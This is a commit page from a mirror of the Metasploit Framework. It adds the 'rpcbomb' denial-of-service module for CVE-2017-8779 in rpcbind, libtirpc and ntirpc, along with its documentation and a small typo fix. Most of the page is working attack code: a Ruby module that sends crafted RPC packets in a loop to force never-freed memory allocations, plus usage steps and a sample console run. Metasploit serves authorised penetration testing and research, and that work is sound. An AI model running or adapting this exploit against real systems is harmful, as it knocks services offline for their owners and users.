infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #8515, Rpcbomb DoS Module

bug/bundler_fix
Pearce Barry 2017-06-05 14:13:49 -05:00
parent 91c337b776 bc3b883758
commit 851adf4987
No known key found for this signature in database
GPG Key ID: 0916F4DEA5C5DE0A
3 changed files with 104 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
data/markdown_doc/auxiliary_scanner_template.erb
View File

@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
msf <%= mod.type %>(<%= mod.shortname %>) > exploit msf <%= mod.type %>(<%= mod.shortname %>) > exploit
``` ```
Other examples of setting the RHSOTS option: Other examples of setting the RHOSTS option:
Example 1: Example 1:

29
documentation/modules/auxiliary/dos/rpc/rpcbomb.md Normal file
View File

@ -0,0 +1,29 @@
## Vulnerable Application
This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4,
LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.
Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.
## Verification Steps
1. Start msfconsole
1. Do: `use auxiliary/dos/rpc/rpcbomb`
1. Do: `set RHOSTS [IP]`
1. Do: `run`
1. Target should leak memory
## Scenarios
### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)
```
msf > use auxiliary/dos/rpc/rpcbomb
msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7
msf auxiliary(rpcbomb) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rpcbomb) >
```

74
modules/auxiliary/dos/rpc/rpcbomb.rb Normal file
View File

@ -0,0 +1,74 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Dos
include Msf::Auxiliary::Report
include Msf::Auxiliary::UDPScanner
def initialize(info={})
super(update_info(info,
'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',
'Description' => %q{
This module exploits a vulnerability in certain versions of
rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
large (and never freed) memory allocations for XDR strings on
the target.
},
'Author' =>
[
'guidovranken', # original code
'Pearce Barry <pearce_barry[at]rapid7.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2017-8779' ],
[ 'BID', '98325' ],
[ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]
],
'Disclosure Date' => 'May 03 2017'))
register_options([
Opt::RPORT(111),
OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
])
end
def scan_host(ip)
pkt = [
0, # xid
0, # message type CALL
2, # RPC version 2
100000, # Program
4, # Program version
9, # Procedure
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Credentials AUTH_NULL
0, # Credentials length 0
0, # Program: 0
0, # Ver
4, # Proc
4, # Argument length
datastore['ALLOCSIZE'] # Payload
].pack('N*')
s = udp_socket(ip, datastore['RPORT'])
count = 0
while count < datastore['COUNT'] do
begin
s.send(pkt, 0)
rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
vprint_error("Host #{ip} unreachable")
break
end
count += 1
end
vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
end
end